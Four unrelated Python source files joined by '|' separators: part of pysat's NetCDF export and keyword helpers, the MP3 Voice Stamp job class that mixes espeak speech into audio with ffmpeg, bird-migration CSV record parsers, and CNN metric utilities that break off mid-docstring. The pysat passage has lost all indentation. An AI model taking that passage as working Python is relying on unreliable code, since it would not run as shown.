self[key].iloc[data_loc].index.name
else:
for export_name_label in export_name_labels:
new_dict[export_name_label] = key
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype, export_nan=export_nan)
# Assign metadata dict
cdfkey.setncatts(new_dict)
# Set data
temp_cdf_data = np.zeros(
(num, dims[0])).astype(coltype)
for i in range(num):
temp_cdf_data[i, :] = \
self[key].iloc[i].index.astype(str)
cdfkey[:, :] = temp_cdf_data.astype(coltype)
# Store any non standard attributes. Compare this Instrument's
# attributes to base object
base_attrb = dir(base_instrument)
this_attrb = dir(self)
# Filter out any 'private' attributes (those that start with a '_')
adict = {}
for key in this_attrb:
if key not in base_attrb:
if key[0] != '_':
adict[key] = self.__getattribute__(key)
# Add additional metadata to conform to standards
adict['pysat_version'] = pysat.__version__
if 'Conventions' not in adict:
adict['Conventions'] = 'SPDF ISTP/IACG Modified for NetCDF'
if 'Text_Supplement' not in adict:
adict['Text_Supplement'] = ''
# Remove any attributes with the names below.
# pysat is responible for including them in the file.
items = ['Date_End', 'Date_Start', 'File', 'File_Date',
'Generation_Date', 'Logical_File_ID']
for item in items:
if item in adict:
_ = adict.pop(item)
adict['Date_End'] = dt.datetime.strftime(
self.index[-1], '%a, %d %b %Y, %Y-%m-%dT%H:%M:%S.%f')
adict['Date_End'] = adict['Date_End'][:-3] + ' UTC'
adict['Date_Start'] = dt.datetime.strftime(
self.index[0], '%a, %d %b %Y, %Y-%m-%dT%H:%M:%S.%f')
adict['Date_Start'] = adict['Date_Start'][:-3] + ' UTC'
adict['File'] = os.path.split(fname)
adict['File_Date'] = self.index[-1].strftime(
'%a, %d %b %Y, %Y-%m-%dT%H:%M:%S.%f')
adict['File_Date'] = adict['File_Date'][:-3] + ' UTC'
adict['Generation_Date'] = dt.datetime.utcnow().strftime('%Y%m%d')
adict['Logical_File_ID'] = os.path.split(fname)[-1].split('.')[:-1]
# check for binary types, convert when found
for key in adict.keys():
if adict[key] is None:
adict[key] = ''
elif isinstance(adict[key], bool):
adict[key] = int(adict[key])
# attach attributes
out_data.setncatts(adict)
return
#
# ----------------------------------------------
# Utilities supporting the Instrument Object
# ----------------------------------------------
#
def _kwargs_keys_to_func_name(kwargs_key):
""" Convert from self.kwargs key name to the function/method name
Parameters
----------
kwargs_key : str
Key from self.kwargs dictionary
Returns
-------
func_name : str
Name of method or function associated with the input key
"""
func_name = '_{:s}_rtn'.format(kwargs_key)
return func_name
# Hidden variable to store pysat reserved keywords. Defined here
# since these values are used by both the Instrument class and
# a function defined below.
_reserved_keywords = ['fnames', 'inst_id', 'tag', 'date_array',
'data_path', 'format_str', 'supported_tags',
'start', 'stop', 'freq']
def _get_supported_keywords(local_func):
"""Return a dict of supported keywords
Parameters
----------
local_func : Python method or functools.partial
Method used to load data within pysat
Returns
-------
out_dict : dict
dict of supported keywords and default values
Note
----
If the input is a partial function then the list of keywords returned only
includes keywords that have not already been set as part of the
functools.partial instantiation.
"""
global _reserved_keywords
# Account for keywords that are treated by Instrument as args
pre_kws = _reserved_keywords.copy()
# Check if this is a partial function
if isinstance(local_func, functools.partial):
# get keyword arguments already applied to function
existing_kws = local_func.keywords
# pull out python function portion
local_func = local_func.func
else:
existing_kws = {}
# account for keywords already set since input was a partial function
pre_kws.extend(existing_kws.keys())
# Get the lists of arguments and defaults
# The args and kwargs are both in the args list, and args are placed first
#
# modified from code on
# https://stackoverflow.com/questions/196960/
# can-you-list-the-keyword-arguments-a-function-receives
sig = inspect.getfullargspec(local_func)
func_args = list(sig.args)
# Recast the function defaults as a list instead of NoneType or tuple.
# inspect returns func_defaults=None when there are no defaults
if sig.defaults is None:
func_defaults = []
else:
func_defaults = [dval for dval in sig.defaults]
# Remove arguments from the start of the func_args list
while len(func_args) > len(func_defaults):
func_args.pop(0)
# Remove pre-existing keywords from output. Start by identifying locations
pop_list = [i for i, arg in enumerate(func_args) if arg in pre_kws]
# Remove pre-selected by cycling backwards through the list of indices
for i in pop_list[::-1]:
func_args.pop(i)
func_defaults.pop(i)
# Create the output dict
out_dict = {akey: func_defaults[i] for i, akey in enumerate(func_args)}
return out_dict
def _pass_func(*args, **kwargs):
""" Default function for updateable Instrument methods
"""
pass
def _check_load_arguments_none(args, raise_error=False):
"""Ensure all arguments are None.
Used to support .load method checks that arguments that should be
None are None, while also keeping the .load method readable.
Parameters
----------
args : iterable object
Variables that are to checked to ensure None
raise_error : bool
If True, an error is raised if all args aren't None (default=False)
Raises
------
ValueError
If all args aren't None and raise_error is True
Raises
-------
bool
True, if all args are None
"""
all_none = True
for arg in args:
if arg is not None:
all_none = False
if raise_error:
estr = ''.join(('An inconsistent set of inputs have been ',
'supplied as input. Please double-check that ',
'only date, filename, or year/day of year ',
'combinations are provided.'))
raise ValueError(estr)
return all_none
|
# coding=utf8
"""
MP3 Voice Stamp
Athletes' companion: adds synthetized voice overlay with various
info and on-going timer to your audio files
Copyright ©2018 <NAME> <mail [@] <EMAIL>>
https://github.com/MarcinOrlowski/Mp3VoiceStamp
"""
from __future__ import print_function
import os
import shutil
import tempfile
from mp3voicestamp_app.audio import Audio
from mp3voicestamp_app.mp3_file_info import Mp3FileInfo
from mp3voicestamp_app.util import Util
from mp3voicestamp_app.tools import Tools
from mp3voicestamp_app.log import Log
class Job(object):
    """Single processing job: overlays spoken title and time ticks onto one
    MP3 file, using espeak for speech synthesis and ffmpeg for mixing.
    """
    def __init__(self, config, tools):
        # Runtime configuration (formats, speech settings, cleanup flags, ...)
        self.__config = config
        # Temporary working folder; created on demand by __make_temp_dir()
        self.__tmp_dir = None
        # Path of the in-progress output MP3, tracked so __cleanup() can
        # remove it if processing fails midway
        self.__tmp_mp3_file = None
        # Locator for external tools (espeak, ffmpeg, ...)
        self.__tools = tools
        # Audio helper used for RMS measurement, gain adjustment and mixing
        self.__audio = Audio(tools)
    def get_out_file_name(self, music_track):
        """Build out file name based on provided template and music_track data
        """
        out_base_name, out_base_ext = Util.split_file_name(music_track.file_name)
        formatted_file_name = self.__config.file_out_format.format(name=out_base_name, ext=out_base_ext)
        # Fallback: bare source base name (used when file_out points at
        # something that is neither an existing file nor a directory)
        out_file_name = os.path.basename(music_track.file_name)
        if self.__config.file_out is None:
            # No explicit output given: place the formatted name next to
            # the source track
            out_file_name = os.path.join(os.path.dirname(music_track.file_name), formatted_file_name)
        else:
            if os.path.isfile(self.__config.file_out):
                # Explicit existing file given: use that exact path
                out_file_name = self.__config.file_out
            else:
                if os.path.isdir(self.__config.file_out):
                    # Directory given: put the formatted name inside it
                    out_file_name = os.path.join(self.__config.file_out, formatted_file_name)
        return out_file_name
    def __make_temp_dir(self):
        # Create the temporary working folder for intermediate WAV files
        self.__tmp_dir = tempfile.mkdtemp()
        Log.d('Tmp dir: {}'.format(self.__tmp_dir))
    def __cleanup(self):
        # Remove the temporary folder and any leftover temporary MP3 file,
        # unless cleanup was disabled via configuration (debug aid)
        if not self.__config.no_cleanup:
            if self.__tmp_dir is not None and os.path.isdir(self.__tmp_dir):
                shutil.rmtree(self.__tmp_dir)
                self.__tmp_dir = None
            # A non-None __tmp_mp3_file means processing failed before the
            # final rename; remove the partial output
            if self.__tmp_mp3_file is not None and os.path.isfile(self.__tmp_mp3_file):
                os.remove(self.__tmp_mp3_file)
        else:
            print('Temp folder "{}" not cleared.'.format(self.__tmp_dir))
    def speak_to_wav(self, text, out_file_name):
        """Render `text` to a WAV via espeak; return True on success.

        The text goes through a temporary file (espeak -f) which avoids
        shell quoting issues with arbitrary track titles.
        """
        # noinspection PyProtectedMember
        text_tmp_file = os.path.join(self.__tmp_dir, next(tempfile._get_candidate_names()) + '.txt')
        # NOTE(review): file is opened in binary mode, so under Python 3
        # `text` would need to be bytes here — confirm interpreter target.
        with open(text_tmp_file, "wb+") as fh:
            fh.write(text)
            # NOTE(review): close() is redundant inside a `with` block
            fh.close()
        rc = Util.execute_rc([self.__tools.get_tool(Tools.KEY_ESPEAK),
                              '-s', str(self.__config.speech_speed),
                              '-z',
                              '-w', out_file_name,
                              '-f', text_tmp_file],
                             debug=self.__config.debug)
        # Keep the text file around for debugging when cleanup is disabled
        if rc == 0 and not self.__config.no_cleanup:
            os.remove(text_tmp_file)
        return rc == 0
    def __create_voice_wav(self, segments, speech_wav_file_name):
        """Speak each text segment to its own WAV, then concatenate all of
        them into a single overlay file, padding each segment so it lands on
        its tick position. Raises RuntimeError if espeak or ffmpeg fail.
        """
        for idx, segment_text in enumerate(segments):
            segment_file_name = os.path.join(self.__tmp_dir, '{}.wav'.format(idx))
            if not self.speak_to_wav(segment_text, segment_file_name):
                raise RuntimeError('Failed to save speak "{0}" into "{1}".'.format(segment_text, segment_file_name))
        # we need to get the frequency of speech waveform generated by espeak to later be able to tell
        # ffmpeg how to pad/clip the part
        import wave
        # Sample rate is read from the first segment; all segments come from
        # the same espeak invocation settings
        wav = wave.open(os.path.join(self.__tmp_dir, '0.wav'), 'rb')
        speech_frame_rate = wav.getframerate()
        wav.close()
        # merge voice overlay segments into one file with needed padding
        concat_cmd = [self.__tools.get_tool(Tools.KEY_FFMPEG), '-y']
        filter_complex = ''
        filter_complex_concat = ';'
        separator = ''
        # Pad targets in samples: rate * 60 s * minutes. The first segment
        # (title) is padded to tick_offset, later segments to tick_interval.
        max_len_tick = speech_frame_rate * 60 * self.__config.tick_interval
        max_len_title = speech_frame_rate * 60 * self.__config.tick_offset
        for idx, _ in enumerate(segments):
            concat_cmd.extend(['-i', os.path.join(self.__tmp_dir, '{}.wav'.format(idx))])
            # samples = rate_per_second * seconds * tick_interval_in_minutes
            max_len = max_len_title if idx == 0 else max_len_tick
            # http://ffmpeg.org/ffmpeg-filters.html#Filtergraph-description
            filter_complex += '{}[{}]apad=whole_len={}[g{}]'.format(separator, idx, max_len, idx)
            separator = ';'
            filter_complex_concat += '[g{}]'.format(idx)
        filter_complex_concat += 'concat=n={}:v=0:a=1'.format(len(segments))
        concat_cmd.extend(['-filter_complex', filter_complex + filter_complex_concat])
        concat_cmd.append(speech_wav_file_name)
        if Util.execute_rc(concat_cmd) != 0:
            raise RuntimeError('Failed to merge voice segments')
    def voice_stamp(self, mp3_file_name):
        """Process one MP3 end to end: sanity checks, speech overlay
        creation, mixing and final write. Returns True on success, False on
        a handled RuntimeError failure.
        """
        result = True
        try:
            Log.level_push('Processing "{}"'.format(mp3_file_name))
            music_track = Mp3FileInfo(mp3_file_name)
            # some sanity checks first
            min_track_length = 1 + self.__config.tick_offset
            # NOTE(review): the ValueError/OSError raised below are not
            # caught by the RuntimeError handler at the bottom and will
            # propagate to the caller — confirm this is intended.
            if music_track.duration < min_track_length:
                raise ValueError(
                    'Track too short (min. {}, current len {})'.format(min_track_length, music_track.duration))
            # check if we can create output file too
            if not self.__config.dry_run_mode:
                if os.path.exists(self.get_out_file_name(music_track)) and not self.__config.force_overwrite:
                    raise OSError('Target "{}" already exists. Use -f to force overwrite.'.format(
                        self.get_out_file_name(music_track)))
            # create temporary folder
            self.__make_temp_dir()
            # let's now create WAVs with our spoken parts.
            ticks = range(self.__config.tick_offset, music_track.duration, self.__config.tick_interval)
            extras = {'config_name': self.__config.name}
            # First goes track title, then time ticks
            # NOTE: we will generate title WAV even if i.e. title_format is empty. This is intentional, to keep
            # further logic simpler, because if both title and tick formats would be empty, then skipping
            # WAV generation would left us with no speech overlay file for processing and mixing.
            # I do not want to have the checks for such case
            track_title_to_speak = Util.prepare_for_speak(
                Util.process_placeholders(self.__config.title_format,
                                          Util.merge_dicts(music_track.get_placeholders(), extras)))
            Log.i('Announced as "{}"'.format(track_title_to_speak))
            Log.v('Announcement format "{}"'.format(self.__config.title_format))
            segments = [track_title_to_speak]
            if self.__config.tick_format != '':
                for time_marker in ticks:
                    # tick_add shifts the announced minute value
                    minutes = time_marker + self.__config.tick_add
                    extras = {'minutes': minutes,
                              'minutes_digits': Util.separate_chars(minutes),
                              }
                    tick_string = Util.process_placeholders(self.__config.tick_format,
                                                            Util.merge_dicts(music_track.get_placeholders(), extras))
                    segments.append(Util.prepare_for_speak(tick_string))
            if self.__config.dry_run_mode:
                Log.i('Duration {} mins, tick count: {}'.format(music_track.duration, (len(segments) - 1)))
                Log.v('Tick format "{}"'.format(self.__config.tick_format))
            if not self.__config.dry_run_mode:
                speech_wav_full = os.path.join(self.__tmp_dir, 'speech.wav')
                self.__create_voice_wav(segments, speech_wav_full)
                # convert source music track to WAV
                music_wav_full_path = os.path.join(self.__tmp_dir, os.path.basename(music_track.file_name) + '.wav')
                music_track.to_wav(music_wav_full_path)
                # calculate RMS amplitude of music track as reference to gain voice to match
                rms_amplitude = self.__audio.calculate_rms_amplitude(music_wav_full_path)
                target_speech_rms_amplitude = rms_amplitude * self.__config.speech_volume_factor
                self.__audio.adjust_wav_amplitude(music_wav_full_path, target_speech_rms_amplitude)
            # mix all stuff together
            file_out = self.get_out_file_name(music_track)
            if not self.__config.dry_run_mode:
                Log.i('Writing: "{}"'.format(file_out))
                # Mix into a temporary name first so a crash never leaves a
                # half-written file under the final output name
                # noinspection PyProtectedMember
                self.__tmp_mp3_file = os.path.join(os.path.dirname(file_out),
                                                   next(tempfile._get_candidate_names()) + '.mp3')
                # noinspection PyUnboundLocalVariable
                self.__audio.mix_wav_tracks(self.__tmp_mp3_file, music_track.get_encoding_quality_for_lame_encoder(),
                                            [music_wav_full_path, speech_wav_full])
                # copy some ID tags to newly create MP3 file
                music_track.write_id3_tags(self.__tmp_mp3_file)
                if os.path.exists(file_out):
                    os.remove(file_out)
                os.rename(self.__tmp_mp3_file, file_out)
                self.__tmp_mp3_file = None
            else:
                output_file_msg = 'Output file "{}"'.format(file_out)
                if os.path.exists(self.get_out_file_name(music_track)):
                    output_file_msg += ' *** TARGET FILE ALREADY EXISTS ***'
                Log.i(output_file_msg)
                Log.v('Output file name format "{}"'.format(self.__config.file_out_format))
            Log.i('')
        except RuntimeError as ex:
            # In debug mode re-raise for a full traceback; otherwise log
            # the error and report failure via the return value
            if not self.__config.debug:
                Log.e(ex)
            else:
                raise
            result = False
        finally:
            Log.level_pop()
            self.__cleanup()
        return result
|
import logging
from datetime import datetime, timedelta
from cerberus import Validator
from conf import settings
from records.record import InvalidRecord, InvalidRecordLength, InvalidRecordProperty, Record
from tools.csv_helpers import TabDialect, CommaDialect
class MigrationChecklistType(object):
    """ class that represents the .csv format of a bird checklist migration type """
    @property
    def map(self):
        """ mapping of provider .csv column headers to mongoDB field names;
        an identity mapping for this provider """
        return {
            'sampling_event_id' : { 'maps_to': 'sampling_event_id'},
            'loc_id' : { 'maps_to': 'loc_id'},
            'latitude' : { 'maps_to': 'latitude'},
            'longitude' : { 'maps_to': 'longitude'},
            'year' : { 'maps_to': 'year'},
            'month' : { 'maps_to': 'month'},
            'day' : { 'maps_to': 'day'},
            'time' : { 'maps_to': 'time'},
            'country' : { 'maps_to': 'country'},
            'state_province' : { 'maps_to': 'state_province'},
            'county' : { 'maps_to': 'county'},
            'count_type' : { 'maps_to': 'count_type'},
            'effort_hrs' : { 'maps_to': 'effort_hrs'},
            'effort_distance_km' : { 'maps_to': 'effort_distance_km'},
            'effort_area_ha' : { 'maps_to': 'effort_area_ha'},
            'observer_id' : { 'maps_to': 'observer_id'},
            'number_observers' : { 'maps_to': 'number_observers'},
            'group_id' : { 'maps_to': 'group_id'},
            'primary_checklist_flag' : { 'maps_to': 'primary_checklist_flag'}}
    def __init__(self):
        """ MigrationChecklistType constructor
        Describes the 'contract' for the report, such as the positional
        processing rules.
        """
        self.collection_name = settings._PATH_COLLECTION_NAME # name of the MongoDB collection
        # record class used to parse each data row of this report type
        self.record = MigrationChecklistRecord
        # positional processing rules
        self.title_position = None # zero-based position of the record set title
        self.header_position = 0 # zero-based position of the record set header
        self.data_position = 1 # zero-based position of the record set
        self.num_empty_rows_eod = 0 # data runs until end of file
        # csv parsing dialect (comma separated)
        self.dialect=CommaDialect()
class MigrationChecklistRecord(Record):
    """ class that represents the mongoDB migration checklist document """
    @property
    def schema(self):
        """ the cerberus schema definition used for validation of this record """
        return {
            # _id is samplingEventID
            'loc_id' : { 'type': 'string', 'nullable': True, 'required': False},
            'loc': { 'type': 'dict', 'schema': {
                'type': {'type': 'string'},
                'coordinates': {'type': 'list'}}, 'nullable': False},
            'year' : { 'type': 'integer', 'nullable': False, 'required': True},
            'month' : { 'type': 'integer', 'nullable': False, 'required': True},
            'day' : { 'type': 'integer', 'nullable': False, 'required': True},
            'time' : { 'type': 'number', 'nullable': True},
            'country' : { 'type': 'string', 'nullable': True},
            'state_province' : { 'type': 'string', 'nullable': True},
            'county' : { 'type': 'string', 'nullable': True},
            'count_type' : { 'type': 'string', 'nullable': True},
            'effort_hrs' : { 'type': 'number', 'nullable': True},
            'effort_distance_km' : { 'type': 'number', 'nullable': True},
            'effort_area_ha' : { 'type': 'number', 'nullable': True},
            'observer_id' : { 'type': 'string', 'nullable': True},
            'number_observers' : { 'type': 'integer', 'nullable': True},
            'group_id' : { 'type': 'string', 'nullable': True},
            'primary_checklist_flag' : { 'type': 'boolean', 'nullable': True},
            'sightings': { 'type': 'list'}}
    def __init__(self, header_row, provider_map, collection_name, row_count, mongo_connection):
        """ MigrationChecklistRecord constructor
        Parameters
        ----------
        header_row : list
            The parsed header row
        provider_map : dict
            Mapping of provider column names to mongoDB field names
        collection_name: str
            The name of the mongoDB collection corresponding to this
            record
        row_count : int
            Row position of this record within the source file
        mongo_connection: object
            The mongoDB connection
        """
        super(MigrationChecklistRecord, self).__init__()
        self.header_row = header_row
        self.provider_map = provider_map
        # list() keeps this usable under Python 3, where map() returns a
        # one-shot iterator that would be exhausted after the first scan
        self.provider_map_keys_lower = list(map(lambda x: x.lower(), provider_map.keys()))
        self.collection_name = collection_name
        self.row_count = row_count
        self.mongo_connection = mongo_connection
        self.validator = Validator(self.schema, transparent_schema_rules=True, allow_unknown=True)
    @staticmethod
    def is_valid_coordinate_pair(coordinates):
        """ validates that a pair of coordinates are floats representing
        longitudes and latitudes
        Parameters
        ----------
        coordinates: list
            The coordinate pair as [longitude,latitude]
        Returns
        -------
        bool
            True when both values are present and within valid ranges
        """
        longitude = coordinates[0]
        latitude = coordinates[1]
        # identity comparison with None is the correct idiom and avoids
        # surprises with custom __eq__ implementations
        if longitude is None or latitude is None:
            return False
        if latitude < -90.0 or latitude > 90.0:
            return False
        if longitude < -180.0 or longitude > 180.0:
            return False
        return True
    def gen_date(self):
        """ generate a datetime object from the fields year, month, and day
        Returns None when the fields are empty, fail schema validation, or
        describe an invalid date.
        """
        if len(self.fields) == 0:
            return None
        if not self.validator.validate(self.fields):
            return None
        date = None
        try:
            theYear = datetime(self.fields['year'], 1, 1)
            # NOTE(review): 'day' is treated as a 1-based day-of-year offset
            # from Jan 1; 'month' is validated but unused here — confirm.
            date = theYear + timedelta(days=self.fields['day'] - 1)
        except ValueError:
            logging.info('Invalid date: year: %r, day: %r', self.fields['year'], self.fields['day'])
        return date
    def create(self, row):
        """ populate the fields with the row data
        The self.fields property will be populated with the column data. An
        ordered dictionary is used as insertion order is critical to
        maintaining positioning with the header. The order of the headers
        within the file is irrelevant but the data must match.
        Parameters
        ----------
        row : object
            The parsed row containing column data
        Raises
        ------
        InvalidRecordProperty
            If the record is missing headers or the headers property
            is None
        InvalidRecordLength
            If the record length does not equal the header.
        """
        if 'header_row' not in self.__dict__:
            raise InvalidRecordProperty('Record is missing "header_row" property')
        if self.header_row is None:
            raise InvalidRecordProperty('Record "header_row" property is None')
        # default coordinates are null
        coordinates = [None, None]
        self.fields['sightings'] = []
        position = 0
        for field in row:
            unmappedHeader = self.header_row[position]
            header = self.map_header(unmappedHeader)
            position += 1
            # we create unmapped schema headers as nullable integers to
            # represent the taxonomy counts
            if header is None:
                sanitized = Record.sanitize_key(unmappedHeader)
                if self.could_be_int(field):
                    value = int(field)
                    # only positive counts are recorded as sightings
                    if value > 0:
                        self.fields[sanitized] = value
                        self.fields['sightings'].append({
                            'bird_id': sanitized,
                            'count': value
                        })
                continue
            # we ignore empty headers
            if Record.is_empty_str(header):
                continue
            # special case for unique id
            if header.lower() == 'sampling_event_id':
                if not Record.is_empty_str(field):
                    self.id = field
                continue
            # special cases to convert to geoJSON
            # Always list coordinates in longitude, latitude order.
            if header.lower() == 'longitude':
                if Record.could_be_float(field):
                    coordinates[0] = float(field)
                continue
            if header.lower() == 'latitude':
                if Record.could_be_float(field):
                    coordinates[1] = float(field)
                continue
            # all other cases set data-type based on schema
            self.set_field_by_schema(header, field)
        # we cannot have invalid geoJSON objects in mongoDB
        if MigrationChecklistRecord.is_valid_coordinate_pair(coordinates):
            loc = {
                'type': 'Point',
                'coordinates': coordinates
            }
        else:
            loc = None
        # add the geoJSON 'loc'
        self.fields['loc'] = loc
        # add the generated date
        self.fields['date'] = self.gen_date()
class MigrationCoreType(object):
    """ class that represents the .csv format of a bird core migration type """
    @property
    def map(self):
        """ mapping of provider .csv column headers to mongoDB field names;
        an identity mapping for this provider """
        return {
            'sampling_event_id' : { 'maps_to': 'sampling_event_id'},
            'loc_id' : { 'maps_to': 'loc_id'},
            'pop00_sqmi' : { 'maps_to': 'pop00_sqmi'},
            'housing_density' : { 'maps_to': 'housing_density'},
            'housing_percent_vacant' : { 'maps_to': 'housing_percent_vacant'},
            'elev_gt' : { 'maps_to': 'elev_gt'},
            'elev_ned' : { 'maps_to': 'elev_ned'},
            'bcr' : { 'maps_to': 'bcr'},
            'bailey_ecoregion' : { 'maps_to': 'bailey_ecoregion'},
            'omernik_l3_ecoregion' : { 'maps_to': 'omernik_l3_ecoregion'},
            'caus_temp_avg' : { 'maps_to': 'caus_temp_avg'},
            'caus_temp_min' : { 'maps_to': 'caus_temp_min'},
            'caus_temp_max' : { 'maps_to': 'caus_temp_max'},
            'caus_prec' : { 'maps_to': 'caus_prec'},
            'caus_snow' : { 'maps_to': 'caus_snow'}}
    def __init__(self):
        """ MigrationCoreType constructor
        Describes the 'contract' for the report, such as the positional
        processing rules.
        """
        self.collection_name = settings._PATH_COLLECTION_NAME # name of the MongoDB collection
        # record class used to parse each data row of this report type
        self.record = MigrationCoreRecord
        # positional processing rules
        self.title_position = None # zero-based position of the record set title
        self.header_position = 0 # zero-based position of the record set header
        self.data_position = 1 # zero-based position of the record set
        self.num_empty_rows_eod = 0 # data runs until end of file
        # csv parsing dialect (comma separated)
        self.dialect=CommaDialect()
class MigrationCoreRecord(Record):
    """ class that represents the mongoDB migration core document """
    @property
    def schema(self):
        """ the cerberus schema definition used for validation of this record """
        return {
            # _id is sampling_event_id
            'loc_id': { 'type': 'string', 'nullable': True},
            'pop00_sqmi': { 'type': 'number', 'nullable': True},
            'housing_density': { 'type': 'number', 'nullable': True},
            'housing_percent_vacant': { 'type': 'number', 'nullable': True},
            'elev_gt': { 'type': 'integer', 'nullable': True},
            'elev_ned': { 'type': 'number', 'nullable': True},
            'bcr': { 'type': 'integer', 'nullable': True},
            'bailey_ecoregion': { 'type': 'string', 'nullable': True},
            'omernik_l3_ecoregion': { 'type': 'integer', 'nullable': True},
            'caus_temp_avg': { 'type': 'integer', 'nullable': True},
            'caus_temp_min': { 'type': 'integer', 'nullable': True},
            'caus_temp_max': { 'type': 'integer', 'nullable': True},
            'caus_prec': { 'type': 'integer', 'nullable': True},
            'caus_snow': { 'type': 'integer', 'nullable': True}}
    def __init__(self, header_row, provider_map, collection_name, row_count, mongo_connection):
        """ MigrationCoreRecord constructor
        Parameters
        ----------
        header_row : list
            The parsed header row
        provider_map : dict
            Mapping of provider column names to mongoDB field names
        collection_name: str
            The name of the mongoDB collection corresponding to this
            record
        row_count : int
            Row position of this record within the source file
        mongo_connection: object
            The mongoDB connection
        """
        super(MigrationCoreRecord, self).__init__()
        self.header_row = header_row
        self.provider_map = provider_map
        # list() keeps this usable under Python 3, where map() returns a
        # one-shot iterator that would be exhausted after the first scan
        self.provider_map_keys_lower = list(map(lambda x: x.lower(), provider_map.keys()))
        self.collection_name = collection_name
        self.row_count = row_count
        self.mongo_connection = mongo_connection
        self.validator = Validator(self.schema, transparent_schema_rules=True, allow_unknown=True)
    def create(self, row):
        """ populate the fields with the row data
        The self.fields property will be populated with the column data. An
        ordered dictionary is used as insertion order is critical to
        maintaining positioning with the header. The order of the headers
        within the file is irrelevant but the data must match.
        Parameters
        ----------
        row : object
            The parsed row containing column data
        Raises
        ------
        InvalidRecordProperty
            If the record is missing headers or the headers property
            is None
        InvalidRecordLength
            If the record length does not equal the header.
        """
        if 'header_row' not in self.__dict__:
            raise InvalidRecordProperty('Record is missing "header_row" property')
        if self.header_row is None:
            raise InvalidRecordProperty('Record "header_row" property is None')
        position = 0
        for field in row:
            unmappedHeader = self.header_row[position]
            header = self.map_header(unmappedHeader)
            position += 1
            # we create unmapped schema headers as nullable numbers to
            # represent the NLCD* headers
            if header is None:
                sanitized = Record.sanitize_key(unmappedHeader)
                if self.could_be_number(field):
                    self.fields[sanitized] = float(field)
                else:
                    self.fields[sanitized] = None
                continue
            # we ignore empty headers
            if Record.is_empty_str(header):
                continue
            # special case for unique id
            if header.lower() == 'sampling_event_id':
                if not Record.is_empty_str(field):
                    self.id = field
                continue
            # all other cases set data-type based on schema
            self.set_field_by_schema(header, field)
|
<filename>tidalclassifier/cnn/metric_utils.py
import os
import json
import warnings
from collections import namedtuple
import matplotlib
# matplotlib.use('Agg') # Force matplotlib to not use any Xwindows backend.
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
from tidalclassifier.cnn import input_utils
def recordMetrics(acc, loss, val_acc, val_loss, instruct):
    """Write per-epoch metric arrays to plain-text files (deprecated).

    Files are named '<name>_<run_n>_<metric>_results.txt' in the working
    directory, one metric per file.

    Args:
        acc: train accuracy values
        loss: train loss values
        val_acc: validation accuracy values
        val_loss: validation loss values
        instruct (dict): configuration instructions with 'name' and 'run_n'
    """
    warnings.warn('recordMetrics will be deprecated in favour of record_aggregate_metrics or similar!')
    prefix = '{}_{}'.format(instruct['name'], str(instruct['run_n']))
    for label, series in (('acc', acc), ('loss', loss),
                          ('val_acc', val_acc), ('val_loss', val_loss)):
        np.savetxt('{}_{}_results.txt'.format(prefix, label), series)
def record_aggregate_metrics(acc, loss, val_acc, val_loss, instruct):
    """Take metrics lists (over many runs) and save as JSON.

    JSON form is [ {run: 0, epoch: [0, 1, 2, ...], loss: [0.5, 1.5, 2.5, ...], ... }, ... ]
    Used as final stage of training a CNN, flexibly writing metrics to disk
    for later analysis.

    Args:
        acc (np.array): of form (run, train accuracy after n epochs)
        loss (np.array): of form (run, train loss after n epochs)
        val_acc (np.array): of form (run, validation accuracy after n epochs)
        val_loss (np.array): of form (run, validation loss after n epochs)
        instruct (dict): configuration instructions, must include 'model_dir'

    Raises:
        ValueError: if acc is not 2-dimensional (run, epoch)
    """
    loc = get_metrics_loc(instruct)
    # asarray generalizes the input to nested lists as well as arrays
    acc = np.asarray(acc)
    loss = np.asarray(loss)
    val_acc = np.asarray(val_acc)
    val_loss = np.asarray(val_loss)
    # Explicit check instead of the old assert-inside-bare-except: asserts
    # vanish under `python -O` and a bare except hides unrelated errors
    if acc.ndim != 2:
        raise ValueError('Failure: dimensionality of metrics not understood')
    results_list = []
    for run in range(len(acc)):
        run_data = {
            'acc': list(acc[run].astype(float)),
            'loss': list(loss[run].astype(float)),
            'val_acc': list(val_acc[run].astype(float)),
            'val_loss': list(val_loss[run].astype(float)),
            'epoch': list(range(len(acc[run]))),  # danger, implicit assumption of epochs
            'run': int(run)
        }
        results_list.append(run_data)
    with open(loc, 'w') as f:
        json.dump(results_list, f)


def get_metrics_loc(instruct):
    """Return canonical path of the metrics JSON inside the model directory."""
    return os.path.join(instruct['model_dir'], 'metrics.json')
def load_metrics_as_table(instruct):
    """Load previously saved CNN metrics into convenient table for analysis

    Args:
        instruct (dict): configuration instructions, used for identifying filename to load

    Returns:
        pd.DataFrame: flat df with metrics by epoch, distinguished by run
    """
    # One JSON entry per run; each becomes a block of rows in the final table
    with open(get_metrics_loc(instruct), 'r') as handle:
        per_run_metrics = json.load(handle)
    # 'run' is constant within each block, so runs stay distinguishable
    run_frames = [pd.DataFrame(data=run_metrics) for run_metrics in per_run_metrics]
    return pd.concat(run_frames, axis=0)
def plot_aggregate_metrics(metric_df, output_dir):
    """Save figures comparing train/test accuracy and loss by epoch.

    Writes 'acc.png' and 'loss.png' into output_dir (created if missing).

    Args:
        metric_df (pd.DataFrame): metrics, including 'loss', 'epoch', 'run' etc. columns
        output_dir (str): directory into which to save figures. Will overwrite!
    """
    if not os.path.isdir(output_dir):
        os.mkdir(output_dir)
    figsize = (8, 4)
    plt.clf()
    sns.set_style("whitegrid")
    # The two figures only differ in which columns are plotted and the axis
    # label, so the shared layout lives in one helper
    _plot_metric_pair(metric_df, 'val_acc', 'acc', 'Accuracy',
                      os.path.join(output_dir, 'acc.png'), figsize)
    _plot_metric_pair(metric_df, 'val_loss', 'loss', 'Loss',
                      os.path.join(output_dir, 'loss.png'), figsize)
    plt.clf()


def _plot_metric_pair(metric_df, val_col, train_col, ylabel, save_loc, figsize):
    """Plot validation (left) and training (right) curves for one metric pair and save to save_loc."""
    fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=figsize, sharex=True, sharey=True)
    for ax, col, title in ((ax1, val_col, 'Validation'), (ax2, train_col, 'Training')):
        sns.lineplot(x='epoch', y=col, data=metric_df, ax=ax)
        ax.set_xlabel('Epoch')
        ax.set_ylabel(ylabel)
        ax.set_ylim([0, 1.0])
        ax.set_title(title)
    fig.tight_layout()
    fig.savefig(save_loc)
def record_test_predictions(model, val_table, instruct, run=None):
    """Write model predictions for every validation subject to a CSV.

    Args:
        model (keras.models.Sequential): trained CNN model.
        val_table (pd.DataFrame): catalog of validation subjects.
        instruct (dict): configuration instructions (gives the output directory).
